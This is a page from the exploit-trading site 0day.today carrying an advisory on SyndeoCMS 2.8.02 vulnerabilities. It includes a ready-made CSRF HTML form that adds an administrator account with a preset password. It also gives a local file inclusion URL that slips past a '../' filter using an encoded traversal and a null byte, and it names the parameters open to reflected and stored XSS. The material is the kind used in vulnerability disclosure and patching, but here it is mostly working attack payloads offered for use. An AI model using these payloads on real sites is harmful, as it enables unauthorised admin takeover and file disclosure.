0day.today - Biggest Exploit Database in the World.
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn
GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Contact us
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
syndeocms 2.8.02 Multiple Vulnerabilities
[=========================================
syndeocms 2.8.02 Multiple Vulnerabilities
=========================================
Title : syndeocms 2.8.02 Multiple Vulnerabilities
Affected Version : syndeocms <= 2.8.02
Vendor Site : http://www.syndeocms.org/
Discovery : abysssec.com
Description :
This CMS have many critical vulnerability that we refere to some of those here:
Vulnerabilites :
1. CSRF - Add Admin Account:
<html>
<body>
<form onsubmit="return checkinput(this);" action="index.php?option=configuration&suboption=users&modoption=save_user&user_id=0" name="form" method="POST">
<input class="textfield" type="hidden" name="fullname" value="csrf"/>
<input class="textfield" type="hidden" name="username" value="csrf_admin"/>
<input class="textfield" type="hidden" name="password" value="admin123"/>
<input class="textfield" type="hidden" name="email" value="csrf@admin.com"/>
<select name="editor">
<option value="1" selected="">FCKEditor</option>
<option value="2">Plain text Editor</option>
</select>
<input type="checkbox" checked="" name="initial" value="1"/>
<input class="textfield" type="hidden" value="" name="sections"/>
<input type="radio" name="access_1" value="1"/>
<input type="radio" name="access_2" value="1"/>
.
.
.
<input type="radio" name="access_15" value="1"/>
<input type="radio" name="m_access[0]" value="1"/>
.
.
.
<input type="radio" name="m_access[21]" value="1"/>
<input class="savebutton" type="submit" name="savebutton" value=" Save"/>
</form>
</body>
</html>
-------------------------------------
2. LFI (Local File Inclusion):
http://localhost/starnet/index.php?option=configuration&suboption=configuration&modoption=edit_css&theme=..%2Findex.php%00
in starnet\core\con_configuration.inc.php file, As you may noticed theme parameter is checked for "../" and could be bypass by with "..%2F":
line 61-73:
switch ($modoption) // start of switch
{
case save_css :
if (IsSet ($_POST['content']))
{
$content = $_POST['content'];
}
if (strpos($theme, "../") === FALSE) //check if someone is trying to fool us.
{
$filename = "themes/$theme/style.css";
-------------------------------------
3. xss:
in starnet\core\con_alerts.inc.php file "email" parameter when "modoption" is "save_alert":
http://localhost/starnet/index.php?option=configuration&suboption=alerts&modoption=edit_alert&alert=2
4. stored xss:
in starnet\core\con_alerts.inc.php file "name" parameter when "modoption" is "save_alert":
http://localhost/starnet/index.php?option=configuration&suboption=alerts&modoption=edit_alert
------------------------------
# 0day.today [2024-07-05] #